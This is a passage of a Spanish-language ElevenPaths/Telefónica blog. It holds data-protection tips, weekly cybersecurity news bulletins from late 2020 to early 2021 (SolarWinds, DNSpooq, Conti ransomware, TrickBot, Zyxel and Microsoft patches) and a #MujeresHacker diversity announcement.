aceptes cuando desconozcas el canal o no estés seguro de su potestad. ¡No hagas clic en enlaces sospechosos! Comprueba los permisos que solicitan (aunque pueda parecer aburrido) y configura la app o el programa de forma segura y correcta antes de empezar a usarlo. Si quieres dormir tranquilo, haz copias de seguridad Ya sea a través de los ya clásicos discos externos como desde la nube, haz siempre copias de seguridad. En caso de pérdida o robo, tanto físico como online, de nuestros dispositivos o cuentas, siempre podemos recurrir a ellos para rescatar la información más valiosa que hemos considerado guardar en ellas. Una solución sencilla, disponible a un solo clic y que, sin duda, nos permitirá dormir completamente tranquilos. ¿Qué recomiendan los expertos? 2 copias físicas, 1 de ellas offline (no conectada) y una en la nube. La información es poder Y más aún en lo que a seguridad en Internet se refiere. Estar al día de los últimos ataques, los avances en ciberseguridad, los antivirus más novedosos… Toda esta información nos dará un conocimiento más amplio para estar bien protegidos desde nuestros dispositivos. En este sentido, las actualizaciones, como los cambios, son bienvenidas. Siempre son para mejor y buscan reforzar de la manera más optima nuestra seguridad, corrigiendo así los fallos de las versiones previas. Si bien es cierto que nuestros dispositivos actuales suelen actualizarse solos, recomendamos también estar al día de las últimas novedades en dichas actualizaciones para asegurarnos de que las cumplimos y celebrar, de la mejor manera posible, este Día Europeo de la Protección de Datos. Todos estos consejos se resumen en ir adquiriendo conocimientos sobre aquellas tecnologías que usamos cotidianamente, para hacerlo cada vez de forma más responsable y segura.
28 de enero de 2021
Boletín semanal de ciberseguridad 16-22 enero
Actualización del compromiso de SolarWinds Se han dado a conocer nuevos detalles acerca del compromiso a la cadena de suministro de software desvelado en diciembre: Los investigadores de FireEye han publicado un análisis que pone el foco en el actor amenaza al que se atribuye el incidente, llamado UNC2452. Este grupo utiliza una combinación de técnicas para moverse lateralmente en la nube de Microsoft 365: el robo de certificados de firma de tokens en ADFS; la modificación o adición de dominios de confianza en Azure AD; el compromiso de credenciales de usuarios locales con altos privilegios sincronizados con M365; y, por último, el abuso de los permisos de una app legítima mediante la instalación de una puerta trasera. Por su parte, los investigadores de Symantec han descubierto una pieza adicional de malware que habría sido utilizada como payload secundario en varios de los sistemas comprometidos por UNC2452. Este malware, denominado Raindrop, es un cargador destinado principalmente a la instalación de Cobalt Strike. La compañía de software MalwareBytes ha admitido en un comunicado haberse visto comprometida por UNC2452, aunque no a través de SolarWinds Orion, sino a través del abuso de una aplicación de terceros con permisos dentro del Office365 corporativo. Señalan, no obstante, que el actor amenaza solo accedió a un limitado número de emails. Investigadores de Microsoft daban más detalles sobre los mecanismos involucrados en la distribución de payloads secundarios (Teardrop, Raindrop, etc.) a partir de la puerta trasera Solorigate (SUNBURST, según la terminología de FireEye), que se sitúa como el origen de los compromisos de entidades públicas y privadas derivados de la troyanización del software SolarWinds Orion. Los investigadores muestran como puerta trasera inicial solo se activa para determinadas víctimas creando dos archivos en disco: un VBScript, que normalmente lleva el nombre de servicios o carpetas existentes para simular actividades legítimas de la máquina; y un implante DLL, que se corresponde con un cargador de Cobalt Strike personalizado. El implante de Cobalt Strike, sin embargo, no se ejecuta de forma directa sino que los atacantes generan un valor de registro IFEO para un proceso de ejecución habitual en Windows, consiguiendo de este modo que su activación se desligue totalmente de la puerta trasera, dificultando la detección y asegurando que Solarigate continúe oculto. Aparte de Teardrop y Raindrop, desde Microsoft aseguran haber detectado otros beacon de Cobalt Strike personalizados. Estos DLLs se colocan principalmente en los subdirectorios de Windows existentes y son asignados con nombres similares a archivos y directorios legítimos para camuflarse lo máximo posible con el entorno. Nuevos datos sobre la Intrusión a la Agencia Europea del Medicamento De forma sucesiva van desvelándose más detalles sobre el acceso no autorizado a la Agencia Europea del Medicamento (EMA) por parte de cibercriminales en el mes de diciembre, donde lograron acceder a documentación confidencial de la vacuna desarrollada por Pfizer-BioNtech. En el último comunicado emitido por la Agencia, se ha confirmado que los cibercriminales filtraron en foros underground a finales de diciembre alguno de los documentos a los que tuvieron acceso entre los que se incluyen correos electrónicos internos relacionados con los procesos de evaluación de la vacuna, documentos de Word, PDF, etc. Además, la EMA ha manifestado que parte de esta correspondencia fue previamente manipulada a su publicación, con el fin de minar la confianza en las vacunas. Más detalles: https://www.ema.europa.eu/en/news/cyberattack-ema-update-5 El FBI advierte sobre nuevos ataques de vishing La Oficina Federal de Investigaciones (FBI) ha emitido una notificación dirigida a la industria privada donde advierte de la detección de técnicas de ingeniería social telefónica con el objetivo de adquirir credenciales corporativas que permitan el acceso a las redes de entidades nacionales e internacionales. Los actores amenaza estarían utilizando plataformas VoIP (también conocidas como servicios de telefonía IP) para ponerse en contacto con empleados de cualquier categoría y guiarlos en el acceso a una página web fraudulenta (por ejemplo, una interfaz VPN falsa) donde introduzcan sus credenciales de acceso. Este primer compromiso les provee de un vector de entrada que posteriormente es utilizado para conseguir mayores privilegios buscando otros usuarios de la red con permisos para crear y modificar correos electrónicos y nombres de usuario. Esta es la segunda advertencia de ataques vishing activos contra empleados emitida por el FBI desde el inicio de la pandemia, después de que un número creciente de ellos se convirtieran en teletrabajadores. Más información: https://beta.documentcloud.org/documents/20458329-cyber-criminals-exploit-network-access-and-privilege-escalation-bleepingcomputer-210115 DNSpooq: siete vulnerabilidades que permiten el secuestro de DNS La consultora de seguridad JSOF ha revelado siete vulnerabilidades en Dnsmasq, un software de redireccionamiento DNS de código abierto ampliamente utilizado para añadir capacidades en dispositivos IoT y otros sistemas embebidos. De forma conjunta, estos fallos han sido denominados como DNSpooq, y podrían aprovecharse para el envenenamiento de la caché DNS, la ejecución remota de código o la realización de ataques de denegación de servicios contra millones de dispositivos afectados. Tres de las vulnerabilidades (catalogadas como CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) permiten realizar ataques de DNS spoofing mediante el envenenamiento de la caché. Con este ataque, los actores amenaza pueden redirigir a los usuarios a servidores maliciosos bajo su control sin que ellos lo adviertan. El resto son vulnerabilidades de desbordamiento de búfer (catalogadas como CVE-2020-25687, CVE-2020-25683, CVE-2020-25682 y CVE-2020-25681) que podrían permitir la ejecución remota de código. Para solucionarlas, se recomienda actualizar Dnsmaq a la versión 2.83 o superior. Toda la información: https://www.jsof-tech.com/disclosures/dnspooq/ Servicios RDP expuestos utilizados para amplificar ataques DDoS Investigadores de seguridad de Netscout han detectado recientemente el aprovechamiento malicioso del protocolo de escritorio remoto de Windows (por sus siglas, RDP) por actores amenaza como parte de la infraestructura de stressers (herramientas para la realización de DDoS por encargo). El servicio RDP se configura habitualmente para recibir peticiones en el puerto 3389, TCP y/o UDP. Cuando se habilita la segunda opción, es posible conseguir una ratio de amplificación de casi 86:1. Los ataques observados varían en tamaño entre los 20 y los 750 Gbps. Todos paquetes enviados son consistentes en su tamaño, 1,260 bytes. Según los investigadores habría más de 14.000 servidores susceptibles a este tipo de ataques. Más detalles: https://www.netscout.com/blog/asert/microsoft-remote-desktop-protocol-rdp-reflectionamplification Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
22 de enero de 2021
Noticias de Ciberseguridad: Boletín semanal 9-15 de enero
Sunburst muestra coincidencias en su código con malware asociado a Rusia Investigadores han encontrado que el malware Sunburst utilizado durante el ataque a la cadena de suministro SolarWinds, muestra coincidencias en sus características con Kazuar, un backdoor .NET asociado al grupo de cibercriminales ruso, Turla (también conocido como Venomous Bear y Waterbug), especializado en el robo de información y ciberespionaje. Estos datos apoyan la atribución del compromiso a una APT ligada a Rusia (que empieza a denominarse como UNC2452 y DarkHalo), confirmado por el FBI, CISA y la NSA la pasada semana. Por su parte, los investigadores de Crowdstrike en colaboración con otras firmas y con el propio SolarWinds, afirman haber logrado identificar el vector de entrada para la inyección del código malicioso en el proceso de desarrollo del software Orion. El malware utilizado para ello se ha denominado Sunspot. Este cuenta con la capacidad de monitorizar los procesos en ejecución para detectar aquellos involucrados en el empaquetado de Orion y proceder entonces a la inyección del backdoor Sunburst en el código fuente, antes incluso de que haya sido leído por el compilador. Nuevo troyano para Android Investigadores de Hispasec alertan de la detección de una nueva familia de malware bancario para dispositivos Android. El aviso se produce tras la detección el pasado jueves 7 de enero de una muestra en las plataformas VirusTotal y Koodus, que, según los investigadores, no parecía pertenecer a ninguna familia de malware bancario ya identificada. Poco después, desde la cuenta de MalwareHunterTeam se hacían eco de esta muestra indicando que algunas formas de antivirus ya la detectaban pero que lo hacían con firmas genéricas de malware bancario o haciendo referencia a familias como Cerberus o Anubis Bankbot. Desde Hispasec indican no observar relación con ninguna de estas dos familias. El objetivo de este nuevo troyano sería, como es habitual, el robo de credenciales mediante su activación tan pronto como se detecta la apertura de una aplicación bancaria en el dispositivo. Para ello, el malware aprovecha los permisos de accesibilidad, que solicita tan pronto como el usuario ejecuta el malware tras su instalación. El objetivo de los desarrolladores de este nuevo malware serían en este momento entidades españolas, ya que la mayor parte de entidades afectadas son entidades de nuestro país, aunque también se habría encontrado afectación para algunas entidades alemanas en menor medida. Accede al detalle desde: https://unaaldia.hispasec.com/2021/01/detectado-un-nuevo-troyano-bancario-para-android.html Boletín de seguridad de Microsoft Microsoft ha publicado su boletín mensual de actualizaciones de seguridad correspondiente al mes de enero, en el que corrigen un total de 83 vulnerabilidades, de las cuales 10 son clasificadas como críticas y el resto importantes. Entre las vulnerabilidades críticas destaca un fallo zero-day (CVE-2021-1647) de ejecución remota de código en el software antivirus Microsoft Defender que estaría siendo explotado activamente, y una vulnerabilidad de elevación de privilegios (CVE-2021-1648) en el servicio splwow64, publicada previamente por el equipo Project Zero de Google. Además, cabe mencionar un fallo de omisión de características de seguridad (CVE-2021-1674) en Windows Remote Desktop y cinco fallos RCE en Windows Remote Procedure Call Runtime. Toda la información: https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan Fallo crítico en Thunderbird Mozilla ha publicado una actualización de seguridad que soluciona una vulnerabilidad crítica (CVE-2020-16044) en Thunderbird y que afecta a todas las versiones anteriores a la última publicada. Este fallo es un problema de escritura use-after-free derivado de la forma en la que se manejan las cookies en el navegador, razón por la que no afecta directamente al cliente Thunderbird de escritorio, pero sí puede explotarse a través de distintos navegadores. En última instancia, podría permitir al atacante la ejecución de código malicioso en el dispositivo afectado. Tanto CISA como el INCIBE han alertado sobre la necesidad de actualizar Thunderbird a la última versión disponible, aspecto que por defecto se realiza automáticamente. Más: https://www.mozilla.org/en-US/security/advisories/mfsa2021-02/#CVE-2020-16044 Avisos de las agencias estadounidenses Dos de las principales agencias estadounidenses en materia de seguridad han publicado alertas sobre distintos asuntos: La Agencia de Ciberseguridad Estadounidense (CISA) emitió un comunicado (AR21-013A) donde advertía tener constancia de diversos compromisos de servicios en la nube corporativos protegidos con autenticación multifactor (MFA). Para lograr el acceso, los actores amenaza están utilizando diferentes técnicas como campañas de phishing, ataques de fuerza bruta y ataques pass-the-cookie, entre otros. La campaña se inserta en la coyuntura generada por el COVID-19 donde múltiples empleados combinan el uso de dispositivos personales y corporativos para el acceso a los servicios empresariales en la nube. CISA también ha señalado que estos ataques no se encuentran vinculados con los agentes amenaza detrás del compromiso a la cadena de suministro SolarWinds. La Agencia de Seguridad Nacional avisaba sobre la necesidad de evitar el uso de resolutores de DNS de terceros para bloquear así los intentos de manipulación de tráfico DNS por parte de actores amenaza. La agencia recomienda que el tráfico de una red empresarial, cifrado o no, solo se envíe al sistema de resolución de DNS de la empresa designada a través de sus propios servidores o a través de servicios externos con soporte incorporado para solicitudes DNS encriptadas como DoH. Por otro lado, la Agencia de Ciberseguridad e Infraestructura (CISA) instó el pasado jueves a las agencias federales a desplegar software de bloqueo de anuncios y a estandarizar el uso de los navegadores web en sus equipos de trabajo con el fin de evitar los anuncios con malware. Asimismo, recomienda al resto de agencias considerar el aislamiento de navegadores web respecto de los sistemas operativos, como ya lo hace el departamento de Defensa. Descubre toda la información: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2471956/nsa-recommends-how-enterprises-can-securely-adopt-encrypted-dns/ https://media.telefonicatech.com/telefonicatech/uploads/2021/1/129929_Capacity_Enhancement_Guide-Securing_Web_Browsers_and_Defending_Against_Malvertising_for_Federal_Agencies.pdf Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
15 de enero de 2021
Noticias de Ciberseguridad: Boletín semanal 2-8 de enero
Actualización sobre SolarWinds Para cerrar el año, Microsoft emitió una actualización de sus investigaciones sobre el impacto en sus sistemas del compromiso de SolarWinds. Recalcan en este comunicado que tanto los servicios de producción como los datos de clientes no se han visto afectados por accesos no autorizados, al igual que no se detectan evidencias del uso de tokens SAML falsificados para el acceso a recursos cloud propios o que su infraestructura se utilizase para atacar a clientes. No obstante, sí desvelan que los atacantes fueron capaces de comprometer un número limitado de cuentas internas, una de las cuales tenía permisos de lectura de código fuente propietario. A través de la misma, se habría accedido a varios repositorios de código que no han sufrido modificaciones, según indica la investigación de Microsoft, al no disponer la cuenta de privilegios de escritura para realizar tales acciones. Por otro lado el departamento de Justicia estadounidense emitió el martes 5 de enero un comunicado donde confirmaban el compromiso de sus sistemas como resultado del ataque a la cadena de suministro que involucra al software SolarWinds Orion. La investigación interna habría revelado que los actores amenaza habrían llegado a moverse entre los sistemas de la red, consiguiendo acceso a las cuentas de correo electrónico de cerca del 3% de los empleados de la entidad, es decir, más de 3000 individuos. Pese a ello, la agencia gubernamental indica que no se ha detectado impacto en aquellos sistemas clasificados. El mismo día que se conocían estos datos, el FBI, CISA, ODNI y la NSA publicaban un comunicado conjunto atribuyendo de forma oficial el ataque a una APT ligada a Rusia. Finalmente, varios medios se han hecho eco de una reciente hipótesis que involucra al software de gestión de proyectos TeamCity como vector de entrada a los sistemas de SolarWinds. Por su parte, la empresa propiedad del software, JetBrains, ha negado estas conjeturas, indicando que desconoce que exista investigación alguna a este respecto. Más información: https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/ https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update Análisis de la infraestructura de C2 maliciosos durante 2020 Insikt Group de Recorded Future ha publicado los resultados de un estudio llevado a cabo sobre la infraestructura de Command and Control (C2) maliciosos identificados durante 2020 a través de sus plataformas. El estudio expone algunos datos destacados como que más de la mitad de los servidores detectados no se encontraban referenciados en fuentes abiertas, o que de media los servidores tienen un ciclo de vida útil dentro de la infraestructura maliciosa de unos 55 días aproximadamente. Por otro lado, también se resalta que los proveedores de Hosting en los que mayor número de servidores maliciosos se detectaron son aquellos que mayor infraestructura tienen, es decir, proveedores como Amazon o Digital Ocean, en contra de la idea tradicional que indica que determinados proveedores de hosting más sospechosos albergarían este tipo de infraestructura. En los detalles revelados se denota una tendencia a la utilización de herramientas de código abierto como parte de las operaciones de infección con malware. Dentro de esta propensión, desde Insikt Group manifiestan la predominancia de varias herramientas de seguridad ofensiva, como son Cobalt Strike y Metasploit, responsables de alojar más de una cuarta parte de todos los servidores C2 analizados. En último lugar, cabe señalar que los investigadores vinculan prácticamente todos los hallazgos a APTs o actores financieros de alto nivel. Más detalles: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/129440_cta-2021-0107.pdf Zyxell corrige una vulnerabilidad crítica en sus dispositivos El fabricante de dispositivos de red Zyxel ha publicado una actualización de seguridad que soluciona una vulnerabilidad crítica en su firmware. Este fallo, identificado como CVE-2020-29583 con CVSS de 7.8, permitiría a un agente amenaza acceder con privilegios de administrador vía ssh a los equipos vulnerables, debido a la existencia de una cuenta secreta (zyfwp) que no se encontraba documentada y cuya contraseña, almacenada en claro en el firmware, era fija. Entre las capacidades que otorga esta vulnerabilidad se tiene la posibilidad de cambiar la configuración del cortafuegos, interceptar el tráfico o crear cuentas VPN para acceder a la red en la que se encuentra el dispositivo. El fallo, descubierto y reportado en diciembre por investigadores de EYE, afecta a los dispositivos Zyxel USG y USG FLEX, ATP y VPN con versión V4.60 del firmware, además de los controladores de puntos de acceso AP NXC2500 con versiones del firmware entre V6.00 y V6.10, todos ellos actualizados y corregidos en las versiones V4.60 Patch1 y V6.10 Patch1. Más información: https://www.zyxel.com/support/CVE-2020-29583.shtml Vulnerabilidad de ejecución remota de código en Zend Framework El investigador de ciberseguridad Ling Yizhou, ha revelado una vulnerabilidad de deserialización en Zend Framework que podría ser explotada por los atacantes para lograr la ejecución remota de código en sitios PHP. El fallo, catalogado como CVE-2021-3007, además de afectar a Zend Framework 3.0.0, podría impactar algunas instancias del sucesor de Zend, Laminas Project. Una aplicación vulnerable podría deserializar y procesar datos recibidos en un formato inadecuado, lo que podría desencadenar desde una denegación de servicio, hasta la posibilidad de que el atacante ejecutase comandos arbitrarios en el contexto de la aplicación. El investigador ha compartido detalles para su explotación a través de Github. Más detalles: https://www.bleepingcomputer.com/news/security/zend-framework-disputes-rce-vulnerability-issues-patch/ Boletín de actualizaciones de seguridad de Google para Android Google ha publicado la actualización de seguridad de enero para su sistema operativo Android en la que se abordan 42 vulnerabilidades, incluyendo cuatro de gravedad crítica. Se destaca la vulnerabilidad catalogada como CVE-2021-0316, la más crítica de esta actualización y que corresponde a un error en el sistema que podría ser explotado para lograr la ejecución de código de forma remota. Otras tres vulnerabilidades abordadas en el componente del sistema de Android presentan un índice de severidad alto. Estas incluyen dos problemas de elevación de privilegio y un error de divulgación de información. Además, el parche de seguridad 2021-01-01 también corrige 15 vulnerabilidades en el Framework, incluyendo un fallo de denegación crítica de servicio (DoS), ocho fallos de elevación de privilegios de alta severidad, cuatro problemas de revelación de información de alta gravedad, un fallo de DoS de alta severidad y una vulnerabilidad de ejecución de código remoto de gravedad media. La segunda parte de las actualizaciones de seguridad aborda un total de 19 vulnerabilidades en el Kernel (tres vulnerabilidades de alta severidad), MediaTek (una vulnerabilidad de alta severidad) y los componentes de Qualcomm (seis vulnerabilidades de alta severidad). En el conjunto de actualizaciones de este mes también se incluyeron parches para nueve fallos en los componentes de código cerrado de Qualcomm (dos vulnerabilidades críticas y siete de alta severidad). Por último, se ha publicado un parche de seguridad para los dispositivos Pixel, correspondientes a otras cuatro vulnerabilidades. Toda la información: https://source.android.com/security/bulletin/pixel/2021-01-01
8 de enero de 2021
#MujeresHacker 2021, ¡YA ESTÁ AQUÍ!
Seguramente, si nunca has oído hablar de #MujeresHacker te estés preguntando qué es lo que es o qué significado tiene este hashtag. No te confundas, #MujeresHacker no es un hashtag, es una iniciativa que desde Telefónica queremos llevar a cada lugar de este planeta para dar a la mujer y la tecnología la visibilidad e importancia que realmente tienen. Bienvenido a #MujeresHacker 2021. Esta acción llega para convertirse en toda una iniciativa internacional que dé fuerza y ponga en valor el potencial de las niñas, chicas y mujeres para estudiar y formarse en lo que ellas deseen, y seguir hasta lo más alto de sus carreras profesionales. Dejando de lado los estereotipos sociales actuales, vamos a presentar, mediante una serie de vídeos, situaciones reales sobre mujeres, hackers y profesiones tecnológicas, para hacer ver que cualquier persona, siendo mujer u hombre, puede dedicarse a profesiones técnicas y más con la demanda actual que está generando la transformación digital. Los sueños y aspiraciones no entienden de género y, por ello, promover y apostar por una mayor presencia del papel femenino en ambientes de trabajo y carreras profesionales STEM enfocadas a la tecnología es el objetivo de esta iniciativa que potenciamos desde ElevenPaths. Hace ya cuatro años que Telefónica decidió respaldar esta realidad social a través de #MujeresHacker. La iniciativa surgió como una necesidad al observar las conclusiones de diversos estudios donde se concluía que a partir de los 15 años las chicas pierden su interés por la ciencia y la tecnología sin razón alguna, y deciden dedicarse a carreras de salud y cuidados, o centradas en las letras. Para frenar esta pérdida nació #MujeresHacker con un objetivo concreto: impulsar la comunidad de mujeres científicas de la compañía para crear referentes sobre las más pequeñas y hacer que estas no pierdan el interés en estas carreras tecnológicas. Y es que para crear tecnología basta con tener ganas y pasión. Nuestras diferencias quedan a un lado cuando se habla de talento y potencial. Esta es la principal razón que ha llevado a #MujeresHacker 2021 a convertirse en una iniciativa global que persigue aunar a ambos géneros en un camino común: la inclusión en el mundo tecnológico. Toda una carrera de fondo que construiremos juntos de la mano de nuestras #MujeresHacker porque en el mundo hacker cabemos todos. Más información: https://mujereshacker.telefonica.com/
23 de diciembre de 2020
Noticias de Ciberseguridad: Boletín semanal 5-11 de diciembre
Boletín de seguridad de Microsoft Microsoft publicó el pasado 8 de diciembre su boletín mensual de actualizaciones de seguridad, que en esta ocasión incluye parches para 58 vulnerabilidades y un advisory para distintos productos de Microsoft. Nueve de las vulnerabilidades corregidas son críticas, 48 tienen una severidad importante y dos riesgo moderado. Entre el total de parches publicados, destacan 22 actualizaciones que hacen referencia a fallos de ejecución remota de código (RCE), y que afectan a productos como Exchange Server o SharePoint, entre otros. Entre los RCE es destacable el que afecta a Hyper-V (CVE-2020-17095), puesto que es explotable a través de un paquete SMB malicioso y podría comprometer la seguridad de las máquinas virtuales creadas con la aplicación. Más información: https://msrc.microsoft.com/update-guide/releaseNote/2020-Dec Explotación de vulnerabilidades en entornos virtualizados por parte de agentes amenaza rusos La Agencia de Seguridad Nacional (NSA) ha publicado un aviso de ciberseguridad en el que detalla como actores amenaza rusos podrían haber explotado una vulnerabilidad de inyección de comandos en productos de VMware (CVE-2020-4006), logrando así acceder a datos protegidos y afectar a los sistemas. La explotación de esta vulnerabilidad requiere que el atacante tenga acceso a la interfaz de gestión del dispositivo, lo que le permitiría falsificar las credenciales mediante el envío de solicitudes aparentemente auténticas con SAML (Security Assetion Markup Language) y ganar así acceso a los datos protegidos. Entre los productos vulnerables se encuentran VMware Workspace One Access, Access Connector, Identity Manager e Identity Manager Connector. La NSA recomienda a los administradores de sistemas NSS, DoD y DIB la aplicación del parche emitido por el proveedor lo antes posible. En caso de que no sea posible un parche inmediato, los administradores del sistema deben aplicar las siguientes mitigaciones: la detección de indicadores en los logs de actividad, la desactivación del servicio de configuración, la correcta configuración de las medidas de autenticación en servidores y servicios, además de la configuración de contraseñas únicas y fuertes. Más detalles: https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195976_20.PDF Compañías farmacéuticas reconocen accesos no autorizados La EMA, órgano regulatorio europeo encargado de la aprobación de las vacunas contra la COVID-19, ha anunciado haber sido víctima de un ciberataque y haber comenzado una investigación para esclarecer la vulneración de sus sistemas. En este mismo sentido, las empresas BioNTech y Pfizer han confirmado la detección de un acceso no autorizado a documentación confidencial relacionada con la vacuna que han desarrollado. También la compañía farmacéutica Sinopharm International Corporation, compañía farmacéutica cuya vacuna para la COVID-19 estaría en estos momentos en fase tres de los análisis clínicos, habría sido suplantada para la distribución de una nueva versión del malware Zebrocy, escrito en Go. Este malware se ha vinculado fundamentalmente contra instituciones gubernamentales y organizaciones comerciales dedicadas a asuntos exteriores. En los últimos meses, venimos viendo cómo las empresas farmacéuticas que desarrollan vacunas contra la COVID-19 están siendo objeto de compromisos por parte de agentes amenazas con respaldo estatal (Fancy Bear APT28, Lazarus Group o Cerium, entre otros). La mayoría de estos ataques se inician con campañas de phishing con archivos maliciosos adjuntos, orientadas a la recopilación de credenciales para posteriormente comprometer los sistemas de estas compañías. Toda la información: https://www.ema.europa.eu/en/news/cyberattack-european-medicines-agency Total System Services (TSYS) víctima del ransomware Conti El pasado 8 de diciembre los operadores del ransomware Conti hacían público en su blog de la Dark Web el compromiso de la compañía del sector financiero Total System Services (TSYS), publicando un 15% de la información sustraída. La compañía ha confirmado que contuvo el ataque en cuanto fueron conscientes del mismo, determinando que no se habrían generado interrupciones en el servicio de pagos y que los datos de las tarjetas no habrían sido extraídos. Fabian Wosar, CEO de la compañía de seguridad informática Emsisoft, asegura que los operadores de Conti solo publican la información en su blog cuando, habiendo instado a la víctima a la realización del pago, esta se niega. Se estima que el grupo de cibercriminales que está detrás de los compromisos de Conti, podrían ser los mismos que operan Ryuk, habiendo sido vinculados al grupo denominado WIZARD SPIDER, de origen ruso, por la compañía de ciberseguridad CrowdStrike. Más información: https://krebsonsecurity.com/2020/12/payment-processing-giant-tsys-ransomware-incident-immaterial-to-company/
11 de diciembre de 2020
Noticias de Ciberseguridad: Boletín semanal 28 de noviembre - 4 de diciembre
Nueva versión del malware TrickBot Los operadores de la botnet TrickBot han agregado una nueva capacidad que les permite interactuar con la BIOS o el firmware UEFI de un equipo infectado. Este nuevo módulo de TrickBot permitiría aumentar la persistencia del malware y lograr que TrickBot sobreviva incluso a reinstalaciones del sistema operativo. Otras aplicaciones de este nuevo módulo serían bloquear de forma remota un dispositivo a nivel de firmware, evitar los controles de seguridad como BitLocker, configurar ataques de seguimiento aprovechando vulnerabilidades de Intel CSME o revertir actualizaciones que parchearon vulnerabilidades de CPU, entre otras. Hasta el momento, el módulo TrickBot solamente estaría comprobando el controlador SPI para verificar si la protección contra escritura de la BIOS está habilitada o no, y no se ha visto que esté modificando el firmware en sí. Sin embargo, el malware ya contiene código para leer, escribir y borrar firmware, lo que sugiere que sus creadores planean usarlo en ciertos escenarios futuros. Más info: https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/ El fabricante de chips Advantech víctima de ransomware Los operadores del ransomware Conti afirman haber comprometido a la empresa Advantech, uno de los fabricantes de chips para entornos industriales (IIoT) con mayor presencia internacional, y estarían exigiendo un rescate de $14 millones para descifrar los sistemas afectados y detener la filtración de datos internos robados. El pasado 26 de noviembre, el grupo comenzó a publicar parte de estos datos internos en su página de la Deep Web, con un archivo de 3.03GB que se corresponde con el 2% de los datos que indican poseer. Los operadores de Conti afirman además que disponen de puertas traseras implementadas en la red de la empresa que eliminarán cuando se pague el rescate. Advantech, de momento, no ha emitido ninguna declaración pública sobre este ataque. Todos los detalles: https://www.bleepingcomputer.com/news/security/iiot-chip-maker-advantech-hit-by-ransomware-125-million-ransom/ Venta de accesos a cuentas de correo de ejecutivos de alto nivel Un actor amenaza ha puesto a la venta contraseñas para acceder a cuentas de correo electrónico de ejecutivos de alto nivel en un conocido foro underground. Las credenciales dan acceso a Office 365 y Microsoft y sus precios oscilan entre 100$ y 1.500$, dependiendo del tamaño de la empresa y el cargo del usuario. Entre las cuentas comercializadas se encuentran las de directores ejecutivos (CEO), directores financieros (CFO), presidentes, vicepresidentes y otros responsables de similar categoría. Un investigador de ciberseguridad que prefiere mantenerse en el anonimato ha confirmado la validez de los datos puestos a la venta mediante la adquisición de varias credenciales pertenecientes al CFO de una empresa de retail Europea y el CEO de una empresa de software estadounidense. Se desconoce con certeza el origen de las credenciales pero cabe la posibilidad de que provengan de datos recuperados de infecciones por AZorult, ya que el mismo actor amenaza había expresado con anterioridad interés en acceder a este tipo de información. Para saber más: https://www.zdnet.com/article/a-hacker-is-selling-access-to-the-email-accounts-of-hundreds-of-c-level-executives/ Crutch, herramienta de ciberespionaje de Turla Investigadores de seguridad de ESET han descubierto un nuevo malware con capacidades de infostealer y puerta trasera vinculado al grupo de ciberespionaje de habla rusa APT Turla. El malware es en realidad un conjunto de herramientas denominado “Crutch” que puede eludir las medidas de seguridad al abusar de plataformas legítimas, incluido el servicio de intercambio de archivos Dropbox, para esconderse detrás del tráfico normal de la red. Este malware, utilizado desde 2015 hasta principios de 2020, habría sido diseñado con el objetivo de exfiltrar documentos confidenciales y otro tipo de archivos a diferentes cuentas de Dropbox controladas por los operadores de Turla. Además, Crutch parece desplegarse no como puerta trasera de entrada sino después de que los atacantes ya hayan comprometido la red de sus víctimas. Los investigadores afirman haber encontrado este software malicioso en la red de un Ministerio de Asuntos Exteriores en un país de la Unión Europea, lo que sugiere que el uso de Crutch se dirige a objetivos muy específicos. Información completa: https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/ Vulnerabilidad crítica de los firewalls y VPN de ZYXEL Los equipos de seguridad de Zyxel han confirmado el hallazgo de una vulnerabilidad crítica con afectación para sus soluciones de firewall y puntos de acceso VPN que permitiría a los actores amenaza ejecutar código remoto en el sistema de la víctima. Identificada como CVE-2020-25014, se trata de un fallo de desbordamiento de búfer que puede conducir a problemas de corrupción de memoria mediante el envío de un paquete Http especialmente diseñado. La vulnerabilidad ha sido asignada con una criticidad de 8.5/10 en base a CVSSv3 y los expertos consideran que es altamente fácil de explotar, aunque se desconocen detalles adicionales. Todos los productos Zyxel afectados por la falla son compatibles con la función WiFi de Facebook, los fallos han sido solventados en las versiones V4.39 del firmware ZLD y en las versiones V6.10 y posteriores de la serie Unified y Standalone. Más detalles: https://www.zyxel.com/support/Zyxel-security-advisory-for-buffer-overflow-vulnerability.shtml Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
4 de diciembre de 2020
Noticias de Ciberseguridad: Boletín semanal 21-27 de noviembre
